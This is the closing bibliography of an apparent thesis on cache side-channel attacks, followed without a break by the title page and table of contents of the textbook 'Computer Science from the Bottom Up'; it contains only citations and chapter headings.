the 2013 IEEE Symposium on Security and Privacy , pages 191–205,
2013.
[i65] Intel i650. Intel Core i5-650 Processor . http://ark.intel.com/
es/products/43546/Intel-Core-i5-650-Processor-4M-Cache-3_
20-GHz .
[i74] Intel i7402M. Intel i7-4702M Processor
. http://ark.intel.com/products/75119/
Intel-Core-i7-4702MQ-Processor-6M-Cache-up-to-3_20-GHz .
[IES15a] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. S$A: A Shared
Cache Attack that Works Across Cores and Defies VM Sandboxing
and its Application to AES. In 36th IEEE Symposium on Security and
Privacy (S&P 2015) , pages 591–604, 2015.
[IES15b] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. Systematic Re-
verse Engineering of Cache Slice Selection in Intel Processors. In Pro-
ceedings of the 2015 Euromicro Conference on Digital System Design ,
DSD ’15, pages 629–636, Washington, DC, USA, 2015. IEEE Com-
puter Society.
[IES16] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. Cross Processor
Cache Attacks. In Proceedings of the 11th ACM on Asia Conference on
Computer and Communications Security , ASIA CCS ’16, pages 353–
364, New York, NY, USA, 2016. ACM.
[IGES16] Mehmet Sinan  ̇Inc ̇I, Berk G ̈ ulmezoglu, Thomas Eisenbarth, and Berk
Sunar. Co-Location Detection on the Cloud. In Constructive Side-
Channel Analysis and Secure Design: 7th International Workshop,
COSADE 2016, Graz, Austria, April 14-15, 2016, Revised Selected
Papers , pages 19–34, Cham, 2016. Springer International Publishing.
[ ̇IGI+16a] Mehmet Sinan  ̇Inci, Berk Gulmezoglu, Gorka Irazoqui, Thomas Eisen-
barth, and Berk Sunar. Cache Attacks Enable Bulk Key Recovery
on the Cloud. In Benedikt Gierlichs and Axel Y. Poschmann, edi-
tors, Cryptographic Hardware and Embedded Systems – CHES 2016:
175
18th International Conference, Santa Barbara, CA, USA, August 17-
19, 2016, Proceedings , 2016.
[IGI+16b] Mehmet Sinan  ̇Inc ̇I, Berk Gulmezoglu, Gorka Irazoqui, Thomas Eisen-
barth, and Berk Sunar. Cache Attacks Enable Bulk Key Recovery on
the Cloud. In Cryptographic Hardware and Embedded Systems–CHES
2016: 18th International Conference, Santa Barbara, CA, USA, Au-
gust 17-19, 2016, Proceedings , volume 9813, page 368. Springer, 2016.
[IIES14a] Gorka Irazoqui, Mehmet Sinan Inci, Thomas Eisenbarth, and Berk
Sunar. Fine Grain Cross-VM Attacks on Xen and VMware. In 2014
IEEE Fourth International Conference on Big Data and Cloud Com-
puting, BDCloud 2014, Sydney, Australia, December 3-5, 2014 , pages
737–744, 2014.
[IIES14b] Gorka Irazoqui, Mehmet Sinan  ̇Inc ̇I, Thomas Eisenbarth, and Berk
Sunar. Wait a Minute! A fast, Cross-VM Attack on AES. In Research
in Attacks, Intrusions and Defenses: 17th International Symposium,
RAID 2014, Gothenburg, Sweden, September 17-19, 2014. Proceedings ,
pages 299–319, Cham, 2014. Springer International Publishing.
[IIES15] Gorka Irazoqui, Mehmet Sinan  ̇Inc ̇I, Thomas Eisenbarth, and Berk
Sunar. Lucky 13 Strikes Back. In Proceedings of the 10th ACM Sympo-
sium on Information, Computer and Communications Security , ASIA
CCS ’15, pages 85–96, 2015.
[IIES16] Mehmet Sinan Inci, Gorka Irazoqui, Thomas Eisenbarth, and Berk
Sunar. Efficient Adversarial Network Discovery Using Logical Channels
on Microsoft Azure. In Proceedings of the 32Nd Annual Conference
on Computer Security Applications , ACSAC ’16, pages 436–447, New
York, NY, USA, 2016. ACM.
[iM] Intel i5 4200M. Intel Core i5-4200M Proces-
sor. http://ark.intel.com/es/products/75459/
Intel-Core-i5-4200U-Processor-3M-Cache-up-to-2_60-GHz .
[inta] Intel Core i5-650 Processor . http://ark.intel.com/es/products/
43546/Intel-Core-i5-650-Processor-4M-Cache-3_20-GHz .
[intb] Intel Core Xeon E5-2609 Processor . http://ark.intel.com/
products/64588/Intel-Xeon-Processor-E5-2609-10M-Cache-2_
40-GHz-6_40-GTs-Intel-QPI .
[intc] Intel Core Xeon E5-2640 Processor .
http://ark.intel.com/es/products/83359/
Intel-Xeon-Processor-E5-2640-v3-20M-Cache-2_60-GHz .
176
[Intd] Intel. An Introduction to the QuickPath Interconnect.
http://www.intel.com/content/dam/doc/white-paper/
quick-path-interconnect-introduction-paper.pdf .
[Inte] Intel. How to Use Huge Pages to Improve Application Performance on
Intel Xeon Phi Coprocessor . https://software.intel.com/sites/
default/files/Large_pages_mic_0.pdf .
[IQP] IQP. Intel QuickPath Architecture. http://www.intel.com/
pressroom/archive/reference/whitepaper_QuickPath.pdf .
[JC07] Lei Jin and Sangyeun Cho. Better than the Two: Exceeding Private
and Shared Caches via Two-Dimensional Page Coloring. In Proc. Intl
Workshop Chip Multiprocessor Memory Systems and Interconnects ,
CMP-MSI ’07, 2007.
[Jon10] M. T. Jones. Anatomy of Linux Kernel Shared Mem-
ory. http://www.ibm.com/developerworks/linux/library/
l-kernel-shared-memory/l-kernel-shared-memory-pdf.pdf/ ,
2010.
[JY03] Marc Joye and Sung-Ming Yen. The montgomery powering ladder. In
Cryptographic Hardware and Embedded Systems - CHES 2002: 4th
International Workshop Redwood Shores, CA, USA, August 13–15,
2002 Revised Papers , pages 291–302, Berlin, Heidelberg, 2003. Springer
Berlin Heidelberg.
[KASZ09] J. Kong, O. Aciicmez, J.-P. Seifert, and Huiyang Zhou. Hardware-
software integrated approaches to defend against software cache-based
side channel attacks. In IEEE 15th International Symposium on High
Performance Computer Architecture, 2009 , HPCA ’09, pages 393–404,
Feb 2009.
[KDK+14a] Yoongu Kim, Ross Daly, Jeremie Kim, Chris Fallin, Ji Hye Lee,
Donghyuk Lee, Chris Wilkerson, Konrad Lai, and Onur Mutlu. Flip-
ping Bits in Memory Without Accessing Them: An Experimental
Study of DRAM Disturbance Errors. In Proceeding of the 41st An-
nual International Symposium on Computer Architecuture , ISCA ’14,
pages 361–372, Piscataway, NJ, USA, 2014. IEEE Press.
[KDK14b] G. Kurian, S. Devadas, and O. Khan. Locality-Aware Data Replication
in the Last-Level Cache. In IEEE 20th International Symposium on
High Performance Computer Architecture 2014 , HPCA ’14, pages 1–
12, Feb 2014.
177
[KJC+10] Joonho Kong, Johnsy K John, Eui-Young Chung, Sung Woo Chung,
and Jie Hu. On the thermal Attack in Instruction Caches. IEEE Trans-
actions on Dependable and Secure Computing , 7(2):217–223, 2010.
[KJJ99] Paul Kocher, Joshua Jaffe, and Benjamin Jun. Differential Power Anal-
ysis. In Advances in Cryptology CRYPTO 99 , volume 1666 of Lecture
Notes in Computer Science , pages 388–397. 1999.
[KJJR11] Paul Kocher, Joshua Jaffe, Benjamin Jun, and Pankaj Rohatgi. In-
troduction to differential power analysis. Journal of Cryptographic
Engineering , 1(1):5–27, 2011.
[Koc94] C. K. Koc. High-Speed RSA Implementation. ftp://ftp.
rsasecurity.com/pub/pdfs/tr201.pdf , 1994.
[Koc96] Paul C. Kocher. Timing Attacks on Implementations of Diffie-
Hellman, RSA, DSS, and Other Systems. In Advances in Cryptology
— CRYPTO ’96 , volume 1109 of Lecture Notes in Computer Science ,
pages 104–113, 1996.
[KPMR12] Taesoo Kim, Marcus Peinado, and Gloria Mainar-Ruiz. STEALTH-
MEM: System-Level Protection Against Cache-Based Side Channel At-
tacks in the Cloud. In the 21st USENIX Security Symposium (USENIX
Security 12) , pages 189–204, Bellevue, WA, 2012. USENIX.
[KRVV04] Christopher Kruegel, William Robertson, Fredrik Valeur, and Giovanni
Vigna. Static disassembly of obfuscated binaries. In Proceedings of
the 13th Conference on USENIX Security Symposium - Volume 13 ,
SSYM’04, pages 18–18, Berkeley, CA, USA, 2004. USENIX Associa-
tion.
[KSM] KSM. Kernel Samepage Merging.
http://kernelnewbies.org/Linux_2_6_32\
#head-d3f32e41df508090810388a57efce73f52660ccb/ .
[KSS10] M. Kasper, W. Schindler, and M. Stottinger. A stochastic method for
security evaluation of cryptographic FPGA implementations. In Field-
Programmable Technology (FPT), 2010 International Conference on ,
pages 146–153. IEEE, December 2010.
[KVM] KVM. Huge Page Configuration in KVM. http://www-01.ibm.com/
support/knowledgecenter/linuxonibm/liaat/liaattunconfighp.
htm?lang=en .
[LD00] Julio Lpez and Ricardo Dahab. An overview of elliptic curve cryptog-
raphy. Technical report, 2000.
178
[LGS+16] Moritz Lipp, Daniel Gruss, Raphael Spreitzer, Cl ́ ementine Maurice,
and Stefan Mangard. ARMageddon: Cache Attacks on Mobile Devices.
In25th USENIX Security Symposium, USENIX Security 16, Austin,
TX, USA, August 10-12, 2016. , pages 549–564, 2016.
[LGY+16] Fangfei Liu, Qian Ge, Yuval Yarom, Frank Mckeen, Carlos Rozas,
Gernot Heiser, and Ruby B Lee. CATalyst: Defeating Last-Level Cache
Side Channel Attacks in Cloud Computing. In IEEE Symposium on
High-Performance Computer Architecture , HPCA ’16, pages 406–418,
Barcelona, Spain, mar 2016.
[Lib] Best 2016 antivirus. http://www.pcmag.com/article2/0,2817,
2388652,00.asp .
[Lin] Linux. Cross-Referenced Linux and Device Driver Code.
[LL14] Fangfei Liu and Ruby B Lee. Random Fill Cache Architecture. In
2014 47th Annual IEEE/ACM International Symposium on Microar-
chitecture , Micro ’14, pages 203–215. IEEE, 2014.
[LSG+16] Sangho Lee, Ming-Wei Shih, Prasun Gera, Taesoo Kim, Hyesoon Kim,
and Marcus Peinado. Inferring Fine-grained Control Flow Inside SGX
Enclaves with Branch Shadowing. arXiv preprint arXiv:1603.06952 ,
abs/1611.06952, 2016.
[MHSM09] D. Molka, D. Hackenberg, R. Schone, and M.S. Muller. Memory Per-
formance and Cache Coherency Effects on an Intel Nehalem Multipro-
cessor System. In Parallel Architectures and Compilation Techniques,
2009. PACT ’09. 18th International Conference on , pages 261–270,
Sept 2009.
[Mic] Microsemi. Side Channel Analysis. https://www.microsemi.com/
products/fpga-soc/security/side-channel-analysis .
[Mil86] Victor S Miller. Use of elliptic curves in cryptography. In Lecture Notes
in Computer Sciences; 218 on Advances in cryptology—CRYPTO 85 ,
pages 417–426, New York, NY, USA, 1986. Springer-Verlag New York,
Inc.
[ML09] A. Miri and P. Longa. Accelerating scalar multiplication on elliptic
curve cryptosystems over prime fields, March 14 2009. CA Patent
App. CA 2,602,766.
[MRR+15] Ramya Jayaram Masti, Devendra Rai, Aanjhan Ranganathan, Chris-
tian M ̈ uller, Lothar Thiele, and Srdjan Capkun. Thermal covert chan-
nels on multi-core platforms. In 24th USENIX Security Symposium
(USENIX Security 15) , pages 865–880, 2015.
179
[MSN+15] Clmentine Maurice, Nicolas Le Scouarnec, Christoph Neumann,
Olivier Heen, and Aurlien Francillon. Reverse Engineering Intel Last-
Level Cache Complex Addressing Using Performance Counters . In
Proceedings of the 18th International Symposium on Research in At-
tacks, Intrusions, and Defenses - Volume 9404 , RAID 2015, pages
48–65, New York, NY, USA, 2015. Springer-Verlag New York, Inc.
[MWX+15] Jiang Ming, Dinghao Wu, Gaoyao Xiao, Jun Wang, and Peng Liu.
TaintPipe: Pipelined Symbolic Taint Analysis. In 24th USENIX Se-
curity Symposium (USENIX Security 15) , pages 65–80, Washington,
D.C., 2015. USENIX Association.
[NS07] Michael Neve and Jean-Pierre Seifert. Advances on Access-Driven
Cache Attacks on AES. In Selected Areas in Cryptography , volume
4356 of Lecture Notes in Computer Science , pages 147–162. 2007.
[OKSK15] Yossef Oren, Vasileios P. Kemerlis, Simha Sethumadhavan, and Ange-
los D. Keromytis. The Spy in the Sandbox: Practical Cache Attacks in
JavaScript and Their Implications. In Proceedings of the 22Nd ACM
SIGSAC Conference on Computer and Communications Security , CCS
’15, pages 1406–1418, New York, NY, USA, 2015. ACM.
[OST06] Dag Arne Osvik, Adi Shamir, and Eran Tromer. Cache Attacks and
Countermeasures: The Case of AES. In Topics in Cryptology – CT-
RSA 2006: The Cryptographers’ Track at the RSA Conference 2006,
San Jose, CA, USA, February 13-17, 2005. Proceedings , pages 1–20,
Berlin, Heidelberg, 2006. Springer Berlin Heidelberg.
[Paa15] C. Paar. High-Speed RSA Implementation. https://www.emsec.rub.
de/media/attachments/files/2015/09/IKV-1_2015-04-28.pdf ,
2015.
[Pag05] Daniel Page. Partitioned Cache Architecture as a Side-Channel De-
fence Mechanism. IACR Cryptology ePrint Archive, 2005. https:
//eprint.iacr.org/2005/280.pdf .
[Per05] Colin Percival. Cache missing for fun and profit. In Proc. of BSDCan
2005, 2005.
[PGM+16] Peter Pessl, Daniel Gruss, Cl ́ ementine Maurice, Michael Schwarz, and
Stefan Mangard. DRAMA: Exploiting DRAM Addressing for Cross-
CPU Attacks. In 25th USENIX Security Symposium (USENIX Secu-
rity 16) , pages 565–581, Austin, TX, August 2016. USENIX Associa-
tion.
180
[pho] Phoronix Test Suite Tests. https://openbenchmarking.org/tests/
pts.
[PR09] Emmanuel Prouff and Matthieu Rivain. Theoretical and practical as-
pects of mutual information based side channel analysis. In Michel Ab-
dalla, David Pointcheval, Pierre-Alain Fouque, and Damien Vergnaud,
editors, Applied Cryptography and Network Security: 7th International
Conference, ACNS 2009, Paris-Rocquencourt, France, June 2-5, 2009.
Proceedings , 2009.
[Puk94] Friedrich Pukelsheim. The Three Sigma Rule. The American Statisti-
cian, 48(2):88–91, 1994.
[QS16] Rui Qiao and Mark Seaborn. A New Approach for Rowhammer At-
tacks. 2016 IEEE International Symposium on Hardware Oriented
Security and Trust (HOST) , pages 161–166, 2016.
[RDNG16] Nitin Rathi, Asmit De, Helia Naeimi, and Swaroop Ghosh. Cache
Bypassing and Checkpointing to Circumvent Data Security Attacks
on STTRAM. arXiv preprint arXiv:1603.06227 , 2016.
[rdt] How to Benchmark Code Execution Times on Intel IA-32 and
IA-64 Instruction Set Architectures. http://www.intel.com/
content/dam/www/public/us/en/documents/white-papers/
ia-32-ia-64-benchmark-code-execution-paper.pdf .
[Riv11] Matthieu Rivain. Fast and regular algorithms for scalar multiplication
over elliptic curves. Cryptology ePrint Archive, Report 2011/338, 2011.
http://eprint.iacr.org/2011/338 .
[RM15] Chester Rebeiro and Debdeep Mukhopadhyay. A Formal Analy-
sis of Prefetching in Profiled Cache-Timing Attacks on Block Ci-
phers. Cryptology ePrint Archive, Report 2015/1191, 2015. http:
//eprint.iacr.org/2015/1191 .
[RNG16] Nitin Rathi, Helia Naeimi, and Swaroop Ghosh. Side Channel At-
tacks on STTRAM and Low-Overhead Countermeasures. IEEE In-
ternational Symposium on Defect and Fault Tolerance in VLSI and
Nanotechnology Systems (DFT) , 2016.
[RNR+15] Lionel Riviere, Zakaria Najm, Pablo Rauzy, Jean-Luc Danger, Julien
Bringer, and Laurent Sauvage. High precision fault injections on the
instruction cache of armv7-m architectures. In Hardware Oriented Se-
curity and Trust (HOST), 2015 IEEE International Symposium on ,
pages 62–67. IEEE, 2015.
181
[Rol16] Rolf Rolles. Transparent deobfuscation with ida processor module ex-
tensions, 2016.
[RTSS09] Thomas Ristenpart, Eran Tromer, Hovav Shacham, and Stefan Sav-
age. Hey, You, Get off of My Cloud: Exploring Information Leakage in
Third-party Compute Clouds. In Proceedings of the 16th ACM Con-
ference on Computer and Communications Security , CCS ’09, pages
199–212, 2009.
[Sch16] Matthias Schunter. Intel Software Guard Extensions: Introduction and
Open Research Challenges. In Proceedings of the 2016 ACM Workshop
on Software PROtection , SPRO ’16, pages 1–1, New York, NY, USA,
2016. ACM.
[SCNS16] Shweta Shinde, Zheng Leong Chua, Viswesh Narayanan, and Prateek
Saxena. Preventing Page Faults from Telling Your Secrets. In Pro-
ceedings of the 11th ACM on Asia Conference on Computer and Com-
munications Security , ASIA CCS ’16, pages 317–328, New York, NY,
USA, 2016. ACM.
[SIYA12] Kuniyasu Suzaki, Kengo Iijima, Toshiki Yagi, and Cyrille Artho. Ef-
fects of Memory Randomization, Sanitization and Page Cache on Mem-
ory Deduplication. 2012.
[SKH11] Orathai Sukwong, Hyong S Kim, and James C Hoe. Commercial
Antivirus Software Effectiveness: an Empirical Study. Computer ,
44(3):63–70, March 2011.
[SKZ+11] Shekhar Srikantaiah, Emre Kultursay, Tao Zhang, Mahmut T. Kan-
demir, Mary Jane Irwin, and Yuan Xie. MorphCache: A Reconfig-
urable Adaptive Multi-level Cache hierarchy. In 17th International
Conference on High-Performance Computer Architecture (HPCA-17
2011), February 12-16 2011, San Antonio, Texas, USA , pages 231–
242, 2011.
[SLP05] Werner Schindler, Kerstin Lemke, and Christof Paar. A Stochastic
Model for Differential Side Channel Cryptanalysis. In JosyulaR Rao
and Berk Sunar, editors, Cryptographic Hardware and Embedded Sys-
tems CHES 2005 , volume 3659 of Lecture Notes in Computer Science ,
pages 30–46. Springer Berlin Heidelberg, 2005.
[SMY09] Fran ̧ cois-Xavier Standaert, Tal G. Malkin, and Moti Yung. A unified
framework for the analysis of side-channel key recovery attacks. In
Antoine Joux, editor, Advances in Cryptology - EUROCRYPT 2009:
28th Annual International Conference on the Theory and Applications
182
of Cryptographic Techniques, Cologne, Germany, April 26-30, 2009.
Proceedings , pages 443–461, Berlin, Heidelberg, 2009. Springer Berlin
Heidelberg.
[SWG+17] M. Schwarz, S. Weiser, D. Gruss, C. Maurice, and S. Mangard. Mal-
ware Guard Extension: Using SGX to Conceal Cache Attacks. ArXiv
e-prints , February 2017.
[TASS07] David Tam, Reza Azimi, Livio Soares, and Michael Stumm. Managing
Shared L2 Caches on Multicore Systems in Software. In In Proc. of the
Workshop on the Interaction between Operating Systems and Computer
Architecture (WIOSCA) , 2007.
[TNM11] Tatsuya Takehisa, Hiroki Nogawa, and Masakatu Morii. AES flow in-
terception: Key snooping method on virtual machine - exception han-
dling attack for AES-NI -. IACR Cryptology ePrint Archive , 2011:428,
2011.
[UGV08] Leif Uhsadel, Andy Georges, and Ingrid Verbauwhede. Exploiting
Hardware Performance Counters. In Fault Diagnosis and Tolerance in
Cryptography, 2008. FDTC’08. 5th Workshop on , pages 59–67. IEEE,
2008.
[Vau02] Serge Vaudenay. Security Flaws Induced by CBC Padding - Applica-
tions to SSL, IPSEC, WTLS. In Proceedings of In Advances in Cryp-
tology - EUROCRYPT’02 , pages 534–546, 2002.
[vdVFL+16] Victor van der Veen, Yanick Fratantonio, Martina Lindorfer, Daniel
Gruss, Clementine Maurice, Giovanni Vigna, Herbert Bos, Kaveh
Razavi, and Cristiano Giuffrida. Drammer: Deterministic rowham-
mer attacks on mobile platforms. In Proceedings of the 2016 ACM
SIGSAC Conference on Computer and Communications Security , CCS
’16, pages 1675–1689, New York, NY, USA, 2016. ACM.
[VMwa] VMware. Transparent Page Sharing: additional management capabili-
ties and new default settings. http://blogs.vmware.com/security/
vmware-security-response-center/page/2 .
[VMWb] VMWare. Understanding Memory Resource Management in VMware
vSphere 5.0. http://www.vmware.com/files/pdf/mem_mgmt_perf_
vsphere5.pdf .
[VMwc] VMware. VMware Large Page performance . http://www.vmware.
com/files/pdf/large_pg_performance.pdf .
183
[VZRS15] Venkatanathan Varadarajan, Yinqian Zhang, Thomas Ristenpart, and
Michael Swift. A Placement Vulnerability Study in Multi-Tenant Pub-
lic Clouds. In 24th USENIX Security Symposium (USENIX Security
15), pages 913–928, Washington, D.C., August 2015. USENIX Associ-
ation.
[WL07] Zhenghong Wang and Ruby B. Lee. New Cache Designs for Thwarting
Software Cache-based Side Channel Attacks. In Proceedings of the 34th
Annual International Symposium on Computer Architecture , ISCA ’07,
pages 494–505, New York, NY, USA, 2007. ACM.
[WOM11] Carolyn Whitnall, Elisabeth Oswald, and Luke Mather. An Explo-
ration of the Kolmogorov-Smirnov Test as a Competitor to Mutual
Information Analysis. In Emmanuel Prouff, editor, Smart Card Re-
search and Advanced Applications , volume 7079 of Lecture Notes in
Computer Science , pages 234–251. Springer Berlin Heidelberg, 2011.
[WTM13] Vincent M Weaver, Dan Terpstra, and Shirley Moore. Non-
Determinism and Overcount on Modern Hardware Performance
Counter Implementations. In Performance Analysis of Systems and
Software (ISPASS), 2013 IEEE International Symposium on , pages
215–224. IEEE, 2013.
[WW09] P. Weisberg and Y. Wiseman. Using 4KB Page Size for Virtual Memory
is Obsolete. In Proceedings of the 10th IEEE International Conference
on Information Reuse & Integration , IRI’09, pages 262–265, 2009.
[xena] Xen 4.1 Release Notes. http://wiki.xen.org/wiki/Xen_4.1_
Release_Notes .
[Xenb] Xen. X-XEN : Huge Page Support in Xen. https://www.kernel.
org/doc/ols/2011/ols2011-gadre.pdf .
[XWW15] Zhang Xu, Haining Wang, and Zhenyu Wu. A Measurement Study
on Co-residence Threat inside the Cloud. In 24th USENIX Security
Symposium (USENIX Security 15) , pages 929–944, Washington, D.C.,
August 2015. USENIX Association.
[XZZT16] Yuan Xiao, Xiaokuan Zhang, Yinqian Zhang, and Radu Teodorescu.
One Bit Flips, One Cloud Flops: Cross-VM Row Hammer Attacks and
Privilege Escalation. In 25th USENIX Security Symposium (USENIX
Security 16) , pages 19–35, Austin, TX, August 2016. USENIX Associ-
ation.
[Yar16] Yuval Yarom. Mastik: A micro-architectural side-channel toolkit, 2016.
184
[YF14] Yuval Yarom and Katrina Falkner. FLUSH+RELOAD: A High Res-
olution, Low Noise, L3 Cache Side-Channel Attack. In 23rd USENIX
Security Symposium (USENIX Security 14) , pages 719–732, 2014.
[YGH16] Yuval Yarom, Daniel Genkin, and Nadia Heninger. CacheBleed: A
Timing Attack on OpenSSL Constant Time RSA. In Cryptographic
Hardware and Embedded Systems - CHES 2016 - 18th International
Conference, Santa Barbara, CA, USA, August 17-19, 2016, Proceed-
ings, pages 346–367, 2016.
[YGL+15] Yuval Yarom, Qian Ge, Fangfei Liu, Ruby B. Lee, and Gernot Heiser.
Mapping the Intel Last-Level Cache. Cryptology ePrint Archive, Re-
port 2015/905, 2015.
[YS06] Hai Yan and Zhijie Jerry Shi. Studying software implementations of el-
liptic curve cryptography. In Third International Conference on Infor-
mation Technology: New Generations (ITNG’06) , pages 78–83, April
2006.
[YWCL14] Ying Ye, Richard West, Zhuoqun Cheng, and Ye Li. COLORIS: A
Dynamic Cache Partitioning System Using Page Coloring. In Proceed-
ings of the 23rd International Conference on Parallel Architectures and
Compilation , PACT ’14, pages 381–392, New York, NY, USA, 2014.
ACM.
[ZHS16] Andreas Zankl, Johann Heyszl, and Georg Sigl. Automated Detec-
tion of Instruction Cache Leaks in RSA Software Implementations. In
Smart Card Research and Advanced Applications: 15th International
Conference, CARDIS 2016, Cannes, France, November 7–9, 2016, Re-
vised Selected Papers , pages 228–244, Cham, 2016. Springer Interna-
tional Publishing.
[ZIUN08] Li Zhao, Ravi Iyer, Mike Upton, and Don Newell. Towards Hybrid Last
Level Caches for Chip-multiprocessors. SIGARCH Comput. Archit.
News , 36(2):56–63, May 2008.
[ZJOR11] Yinqian Zhang, Ari Juels, Alina Oprea, and Michael K. Reiter. Home-
Alone: Co-residency Detection in the Cloud via Side-Channel Analysis.
InProceedings of the 2011 IEEE Symposium on Security and Privacy ,
SP ’11, pages 313–328, Washington, DC, USA, 2011. IEEE Computer
Society.
[ZJRR12] Yinqian Zhang, Ari Juels, Michael K. Reiter, and Thomas Ristenpart.
Cross-VM Side Channels and Their Use to Extract Private Keys. In
185
Proceedings of the 2012 ACM Conference on Computer and Communi-
cations Security , CCS ’12, pages 305–316, New York, NY, USA, 2012.
ACM.
[ZJRR14] Yinqian Zhang, Ari Juels, Michael K. Reiter, and Thomas Ristenpart.
Cross-Tenant Side-Channel Attacks in PaaS Clouds. In Proceedings of
the 2014 ACM SIGSAC Conference on Computer and Communications
Security , CCS ’14, pages 990–1003, New York, NY, USA, 2014. ACM.
[ZJS+11] David (Yu) Zhu, Jaeyeon Jung, Dawn Song, Tadayoshi Kohno, and
David Wetherall. TaintEraser: Protecting Sensitive Data Leaks Using
Application-level Taint Tracking. SIGOPS Oper. Syst. Rev. , 45(1):142–
154, February 2011.
[ZL14] Tianwei Zhang and Ruby B. Lee. New Models of Cache Architectures
Characterizing Information Leakage from Cache Side Channels. In
Proceedings of the 30th Annual Computer Security Applications Con-
ference , ACSAC ’14, pages 96–105, New York, NY, USA, 2014. ACM.
[ZRZ16] Ziqiao Zhou, Michael K. Reiter, and Yinqian Zhang. A software ap-
proach to defeating side channels in last-level caches. In Proceedings
of the 2016 ACM SIGSAC Conference on Computer and Communica-
tions Security , CCS ’16, pages 871–882, New York, NY, USA, 2016.
ACM.
[ZZL16] Tianwei Zhang, Yinqian Zhang, and Ruby B. Lee. CloudRadar: A
Real-Time Side-Channel Attack Detection System in Clouds. In Re-
search in Attacks, Intrusions, and Defenses: 19th International Sympo-
sium, RAID 2016, Paris, France, September 19-21, 2016, Proceedings ,
2016.
[ZZL17] Tianwei Zhang, Yinqian Zhang, and Ruby B. Lee. Memory DoS At-
tacks in Multi-tenant Clouds: Severity and Mitigation. AsiaCCS 2017 ,
2017.
186Computer Science from the Bottom Up
Ian Wienand
Computer Science from the Bottom Up
Ian Wienand
A PDF version is available at http://www.bottomupcs.com/csbu.pdf . The original souces are available at https://
github.com/ianw/bottomupcs
Copyright © 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 Ian Wienand
Abstract
Computer Science from the Bottom Up — A free, online book designed to teach computer science from the bottom end
up. Topics covered include binary and binary logic, operating systems internals, toolchain fundamentals and system
library fundamentals.
This work is licensed under the Creative Commons Attribution-ShareAlike License. To view a copy of this license, visit http://creativecommons.org/
licenses/by-sa/3.0/  or send a letter to Creative Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
iiiTable of Contents
Introduction  ....................................................................................................................... xi
Welcome  .................................................................................................................. xi
Philosophy  ........................................................................................................ xi
Why from the bottom up ? .................................................................................... xi
Enabling technologies  ......................................................................................... xi
1. General Unix and Advanced C  .......................................................................................... 1
Everything is a file!  ..................................................................................................... 1
Implementing abstraction  .............................................................................................. 2
Implementing abstraction with C  ........................................................................... 2
Libraries ............................................................................................................ 4
File Descriptors  .......................................................................................................... 5
The Shell  ........................................................................................................... 8
2. Binary and Number Representation  ................................................................................... 11
Binary -- the basis of computing  .................................................................................. 11
Binary Theory  ................................................................................................... 11
Hexadecimal  ..................................................................................................... 16
Practical Implications  ......................................................................................... 17
Types and Number Representation  ............................................................................... 19
C Standards  ...................................................................................................... 19
Types .............................................................................................................. 20
Number Representation  ...................................................................................... 25
3. Computer Architecture  .................................................................................................... 33
The CPU  .................................................................................................................. 33
Branching  ......................................................................................................... 33
Cycles ............................................................................................................. 34
Fetch, Decode, Execute, Store  ............................................................................. 34
CISC v RISC  .................................................................................................... 37
Memory ................................................................................................................... 38
Memory Hierarchy  ............................................................................................. 38
Cache in depth  .................................................................................................. 39
Peripherals and busses  ................................................................................................ 42
Peripheral Bus concepts  ...................................................................................... 42
DMA ............................................................................................................... 44
Other Busses  .................................................................................................... 45
Small to big systems  .................................................................................................. 46
Symmetric Multi-Processing  ................................................................................ 46
Clusters ............................................................................................................ 48
Non-Uniform Memory Access  ............................................................................. 49
Memory ordering, locking and atomic operations  .................................................... 51
4. The Operating System  .................................................................................................... 56
The role of the operating system  .................................................................................. 56
Abstraction of hardware  ..................................................................................... 56
Multitasking  ..................................................................................................... 56
Standardised Interfaces  ....................................................................................... 56
Security ........................................................................................................... 57
Performance  ..................................................................................................... 57
Operating System Organisation  .................................................................................... 57
The Kernel  ....................................................................................................... 58
Userspace  ......................................................................................................... 61
System Calls  ............................................................................................................. 62
Overview  ......................................................................................................... 62
Computer Science
from the Bottom Up
ivAnalysing a system call  ...................................................................................... 62
Privileges  ................................................................................................................. 69
Hardware  ......................................................................................................... 69
Other ways of communicating with the kernel  ........................................................ 74
File Systems  ..................................................................................................... 74
5. The Process  .................................................................................................................. 75
What is a process?  ..................................................................................................... 75
Elements of a process  ................................................................................................ 76
Process ID  ........................................................................................................ 77
Memory ........................................................................................................... 77
File Descriptors  ................................................................................................. 82
Registers .......................................................................................................... 82
Kernel State  ...................................................................................................... 82
Process Hierarchy  ...................................................................................................... 83
Fork and Exec  .......................................................................................................... 83
Fork ................................................................................................................ 83
Exec ................................................................................................................ 84
How Linux actually handles fork and exec  ............................................................. 84
The init process  ................................................................................................. 86
Context Switching  ..................................................................................................... 88
Scheduling  ................................................................................................................ 88
Preemptive v co-operative scheduling  ................................................................... 88
Realtime .......................................................................................................... 88
Nice value  ........................................................................................................ 89
A brief look at the Linux Scheduler  ...................................................................... 89
The Shell  ................................................................................................................. 90
Signals ..................................................................................................................... 90
Example ........................................................................................................... 91
6. Virtual Memory  ............................................................................................................. 93
What Virtual Memory isn't ......................................................................................... 93
What virtual memory is .............................................................................................. 93
64 bit computing  ............................................................................................... 93
Using the address space  ...................................................................................... 94
Pages ....................................................................................................................... 94
Physical Memory  ....................................................................................................... 95
Pages + Frames = Page Tables  .................................................................................... 95
Virtual Addresses  ...................................................................................................... 95
Page ................................................................................................................ 96
Offset .............................................................................................................. 96
Virtual Address Translation  ................................................................................. 96
Consequences of virtual addresses, pages and page tables  ................................................. 97
Individual address spaces  .................................................................................... 97
Protection  ......................................................................................................... 98
Swap ............................................................................................................... 98
Sharing memory  ................................................................................................ 99
Disk Cache  ....................................................................................................... 99
Hardware Support  ...................................................................................................... 99
Physical v Virtual Mode  ..................................................................................... 99
The TLB  ........................................................................................................ 101
TLB Management  ............................................................................................ 102
Linux Specifics  ....................................................................................................... 103
Address Space Layout  ...................................................................................... 103
Three Level Page Table  .................................................................................... 104
Hardware support for virtual memory  .......................................................................... 105
Computer Science
from the Bottom Up
vx86-64 ........................................................................................................... 106
Itanium .......................................................................................................... 106
7. The Toolchain  ............................................................................................................. 113
Compiled v Interpreted Programs  ............................................................................... 113
Compiled Programs  .......................................................................................... 113
Interpreted programs  ........................................................................................ 113
Building an executable  ............................................................................................. 113
Compiling  ............................................................................................................... 114
The process of compiling  .................................................................................. 114
Syntax ............................................................................................................ 114
